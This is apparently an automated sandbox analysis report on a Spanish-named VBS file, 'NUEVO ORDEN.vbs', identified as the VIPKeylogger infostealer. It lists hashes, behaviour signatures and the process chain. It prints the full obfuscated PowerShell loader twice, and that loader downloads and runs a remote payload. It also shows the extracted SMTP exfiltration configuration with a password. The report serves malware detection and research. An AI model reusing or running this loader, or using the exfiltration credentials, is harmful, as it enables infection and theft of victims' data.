Analysis
-
max time kernel
70s -
max time network
72s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
NUEVO ORDEN.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
NUEVO ORDEN.vbs
Resource
win10v2004-20241007-en
General
-
Target
NUEVO ORDEN.vbs
-
Size
525KB
-
MD5
2358bb1bd8cf609df9f1917cf4224194
-
SHA1
45e0ca20b16c048979d95b59f40475f8fa282e32
-
SHA256
982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e
-
SHA512
c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230
-
SSDEEP
6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
1446010 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 5 2328 powershell.exe 7 2328 powershell.exe 9 3036 msiexec.exe 11 3036 msiexec.exe 13 3036 msiexec.exe 15 3036 msiexec.exe 16 3036 msiexec.exe 18 3036 msiexec.exe 20 3036 msiexec.exe -
Processes:
powershell.exepowershell.exepid process 2328 powershell.exe 2748 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 3036 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2748 powershell.exe 3036 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 2328 powershell.exe 2748 powershell.exe 2748 powershell.exe 3036 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 3036 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2840 wrote to memory of 2328 2840 WScript.exe powershell.exe PID 2840 wrote to memory of 2328 2840 WScript.exe powershell.exe PID 2840 wrote to memory of 2328 2840 WScript.exe powershell.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe PID 2748 wrote to memory of 3036 2748 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7L21292GINPGT8Z2L69A.temp
Filesize7KB
MD518b7db5ead2014a336bbd513a7935a93
SHA10e6af9ad08db6a8cb0d6d23ce9792612a65fdcb4
SHA25695ed4c306fbe11cdeacb31afdce49cd5554142909a95499402bcb0e3ef5c8c37
SHA51264c1aa0022a528708ce93f241fca2c0f0bb0e1f0d3945d8365b902c473917bdc8c7a34fb3614d4ff8bbc70cce67659d0b0f554edbc26f8524eb86ede1f5b4c60
-
Filesize
460KB
MD515d4bf8d1435c92eafc43ebdff22b873
SHA118a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c